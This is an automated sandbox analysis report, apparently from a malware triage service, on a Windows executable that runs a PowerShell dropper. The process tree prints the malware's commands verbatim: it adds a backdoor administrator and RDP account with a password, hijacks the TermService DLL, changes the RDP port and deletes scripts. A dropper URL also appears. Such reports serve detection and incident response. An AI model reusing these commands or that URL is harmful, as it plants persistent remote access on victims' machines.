6eca26fcfabbb12c6a37eb689de222e75b31574dd25e7fd3d8b446d700c40133

Analysis

max time kernel
120s
max time network
121s
platform
windows10_x64
resource
win10v20210410
submitted
26-05-2021 07:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a33846e1244be6df8f052903ec1a2918.exe
Size

6.0MB
MD5

a33846e1244be6df8f052903ec1a2918
SHA1

4b3ebbfe1cd16ec0a1f0a988d602fedb765307a6
SHA256

6eca26fcfabbb12c6a37eb689de222e75b31574dd25e7fd3d8b446d700c40133
SHA512

22f840e4d931ab69f4673e94938f7524fa793183cd3e35546dbc4c9482705d066b51bcdc05d590d8741613f23f57653ec6c9c88c8eebbcc5a734af3de862bd3d

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

flow	pid	Process
16	2612	powershell.exe
18	2612	powershell.exe
19	2612	powershell.exe
20	2612	powershell.exe
22	2612	powershell.exe
24	2612	powershell.exe
26	2612	powershell.exe
28	2612	powershell.exe
30	2612	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000001ab58-217.dat	upx
behavioral2/files/0x000400000001a50b-218.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
700	Process not Found
700	Process not Found

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xaevfygw.bkz.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4983.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_y3qer4nv.zzh.psm1	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4995.tmp	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4963.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4984.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI49C4.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
908	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1564	powershell.exe
1564	powershell.exe
1564	powershell.exe
3912	powershell.exe
3912	powershell.exe
3912	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
3896	powershell.exe
3896	powershell.exe
3896	powershell.exe
1564	powershell.exe
1564	powershell.exe
1564	powershell.exe
2612	powershell.exe
2612	powershell.exe
2612	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
624	Process not Found
624	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	3912	powershell.exe
Token: SeIncreaseQuotaPrivilege	3912	powershell.exe
Token: SeSecurityPrivilege	3912	powershell.exe
Token: SeTakeOwnershipPrivilege	3912	powershell.exe
Token: SeLoadDriverPrivilege	3912	powershell.exe
Token: SeSystemProfilePrivilege	3912	powershell.exe
Token: SeSystemtimePrivilege	3912	powershell.exe
Token: SeProfSingleProcessPrivilege	3912	powershell.exe
Token: SeIncBasePriorityPrivilege	3912	powershell.exe
Token: SeCreatePagefilePrivilege	3912	powershell.exe
Token: SeBackupPrivilege	3912	powershell.exe
Token: SeRestorePrivilege	3912	powershell.exe
Token: SeShutdownPrivilege	3912	powershell.exe
Token: SeDebugPrivilege	3912	powershell.exe
Token: SeSystemEnvironmentPrivilege	3912	powershell.exe
Token: SeRemoteShutdownPrivilege	3912	powershell.exe
Token: SeUndockPrivilege	3912	powershell.exe
Token: SeManageVolumePrivilege	3912	powershell.exe
Token: 33	3912	powershell.exe
Token: 34	3912	powershell.exe
Token: 35	3912	powershell.exe
Token: 36	3912	powershell.exe
Token: SeDebugPrivilege	912	powershell.exe
Token: SeIncreaseQuotaPrivilege	912	powershell.exe
Token: SeSecurityPrivilege	912	powershell.exe
Token: SeTakeOwnershipPrivilege	912	powershell.exe
Token: SeLoadDriverPrivilege	912	powershell.exe
Token: SeSystemProfilePrivilege	912	powershell.exe
Token: SeSystemtimePrivilege	912	powershell.exe
Token: SeProfSingleProcessPrivilege	912	powershell.exe
Token: SeIncBasePriorityPrivilege	912	powershell.exe
Token: SeCreatePagefilePrivilege	912	powershell.exe
Token: SeBackupPrivilege	912	powershell.exe
Token: SeRestorePrivilege	912	powershell.exe
Token: SeShutdownPrivilege	912	powershell.exe
Token: SeDebugPrivilege	912	powershell.exe
Token: SeSystemEnvironmentPrivilege	912	powershell.exe
Token: SeRemoteShutdownPrivilege	912	powershell.exe
Token: SeUndockPrivilege	912	powershell.exe
Token: SeManageVolumePrivilege	912	powershell.exe
Token: 33	912	powershell.exe
Token: 34	912	powershell.exe
Token: 35	912	powershell.exe
Token: 36	912	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeIncreaseQuotaPrivilege	3896	powershell.exe
Token: SeSecurityPrivilege	3896	powershell.exe
Token: SeTakeOwnershipPrivilege	3896	powershell.exe
Token: SeLoadDriverPrivilege	3896	powershell.exe
Token: SeSystemProfilePrivilege	3896	powershell.exe
Token: SeSystemtimePrivilege	3896	powershell.exe
Token: SeProfSingleProcessPrivilege	3896	powershell.exe
Token: SeIncBasePriorityPrivilege	3896	powershell.exe
Token: SeCreatePagefilePrivilege	3896	powershell.exe
Token: SeBackupPrivilege	3896	powershell.exe
Token: SeRestorePrivilege	3896	powershell.exe
Token: SeShutdownPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeSystemEnvironmentPrivilege	3896	powershell.exe
Token: SeRemoteShutdownPrivilege	3896	powershell.exe
Token: SeUndockPrivilege	3896	powershell.exe
Token: SeManageVolumePrivilege	3896	powershell.exe
Token: 33	3896	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3944 wrote to memory of 1564	3944	a33846e1244be6df8f052903ec1a2918.exe	75
PID 3944 wrote to memory of 1564	3944	a33846e1244be6df8f052903ec1a2918.exe	75
PID 1564 wrote to memory of 3912	1564	powershell.exe	77
PID 1564 wrote to memory of 3912	1564	powershell.exe	77
PID 1564 wrote to memory of 912	1564	powershell.exe	82
PID 1564 wrote to memory of 912	1564	powershell.exe	82
PID 1564 wrote to memory of 3896	1564	powershell.exe	84
PID 1564 wrote to memory of 3896	1564	powershell.exe	84
PID 1564 wrote to memory of 1052	1564	powershell.exe	87
PID 1564 wrote to memory of 1052	1564	powershell.exe	87
PID 1564 wrote to memory of 908	1564	powershell.exe	88
PID 1564 wrote to memory of 908	1564	powershell.exe	88
PID 1564 wrote to memory of 1172	1564	powershell.exe	89
PID 1564 wrote to memory of 1172	1564	powershell.exe	89
PID 1564 wrote to memory of 1392	1564	powershell.exe	90
PID 1564 wrote to memory of 1392	1564	powershell.exe	90
PID 1392 wrote to memory of 3168	1392	net.exe	91
PID 1392 wrote to memory of 3168	1392	net.exe	91
PID 1564 wrote to memory of 640	1564	powershell.exe	92
PID 1564 wrote to memory of 640	1564	powershell.exe	92
PID 640 wrote to memory of 2976	640	cmd.exe	93
PID 640 wrote to memory of 2976	640	cmd.exe	93
PID 2976 wrote to memory of 3896	2976	cmd.exe	94
PID 2976 wrote to memory of 3896	2976	cmd.exe	94
PID 3896 wrote to memory of 3412	3896	net.exe	95
PID 3896 wrote to memory of 3412	3896	net.exe	95
PID 1564 wrote to memory of 3484	1564	powershell.exe	96
PID 1564 wrote to memory of 3484	1564	powershell.exe	96
PID 3484 wrote to memory of 816	3484	cmd.exe	97
PID 3484 wrote to memory of 816	3484	cmd.exe	97
PID 816 wrote to memory of 2344	816	cmd.exe	98
PID 816 wrote to memory of 2344	816	cmd.exe	98
PID 2344 wrote to memory of 2500	2344	net.exe	99
PID 2344 wrote to memory of 2500	2344	net.exe	99
PID 1172 wrote to memory of 2688	1172	cmd.exe	103
PID 1172 wrote to memory of 2688	1172	cmd.exe	103
PID 2688 wrote to memory of 3656	2688	net.exe	104
PID 2688 wrote to memory of 3656	2688	net.exe	104
PID 3408 wrote to memory of 3520	3408	cmd.exe	107
PID 3408 wrote to memory of 3520	3408	cmd.exe	107
PID 3520 wrote to memory of 4000	3520	net.exe	108
PID 3520 wrote to memory of 4000	3520	net.exe	108
PID 3480 wrote to memory of 2620	3480	cmd.exe	111
PID 3480 wrote to memory of 2620	3480	cmd.exe	111
PID 2620 wrote to memory of 3656	2620	net.exe	112
PID 2620 wrote to memory of 3656	2620	net.exe	112
PID 3228 wrote to memory of 2612	3228	cmd.exe	115
PID 3228 wrote to memory of 2612	3228	cmd.exe	115
PID 2612 wrote to memory of 200	2612	net.exe	116
PID 2612 wrote to memory of 200	2612	net.exe	116
PID 3616 wrote to memory of 2688	3616	cmd.exe	119
PID 3616 wrote to memory of 2688	3616	cmd.exe	119
PID 2688 wrote to memory of 504	2688	net.exe	120
PID 2688 wrote to memory of 504	2688	net.exe	120
PID 496 wrote to memory of 3520	496	cmd.exe	123
PID 496 wrote to memory of 3520	496	cmd.exe	123
PID 3520 wrote to memory of 640	3520	net.exe	124
PID 3520 wrote to memory of 640	3520	net.exe	124
PID 1420 wrote to memory of 912	1420	cmd.exe	127
PID 1420 wrote to memory of 912	1420	cmd.exe	127
PID 1392 wrote to memory of 1092	1392	cmd.exe	130
PID 1392 wrote to memory of 1092	1392	cmd.exe	130
PID 3656 wrote to memory of 356	3656	cmd.exe	133
PID 3656 wrote to memory of 356	3656	cmd.exe	133

C:\Users\Admin\AppData\Local\Temp\a33846e1244be6df8f052903ec1a2918.exe
"C:\Users\Admin\AppData\Local\Temp\a33846e1244be6df8f052903ec1a2918.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3896
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1052
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:908
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1172
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1392
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3168
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:640
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2976
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3896
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3412
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3484
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:816
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2344
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2500
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1168
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2368

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1172
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:3656

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc eBwU6nlK /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3408
- C:\Windows\system32\net.exe
  net.exe user wgautilacc eBwU6nlK /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc eBwU6nlK /add
    3⤵
    PID:4000

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3480
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:3656

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3228
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    3⤵
    PID:200

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3616
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:504

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc eBwU6nlK
1⤵
- Suspicious use of WriteProcessMemory
PID:496
- C:\Windows\system32\net.exe
  net.exe user wgautilacc eBwU6nlK
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc eBwU6nlK
    3⤵
    PID:640

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:1420
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Modifies data under HKEY_USERS
  PID:912

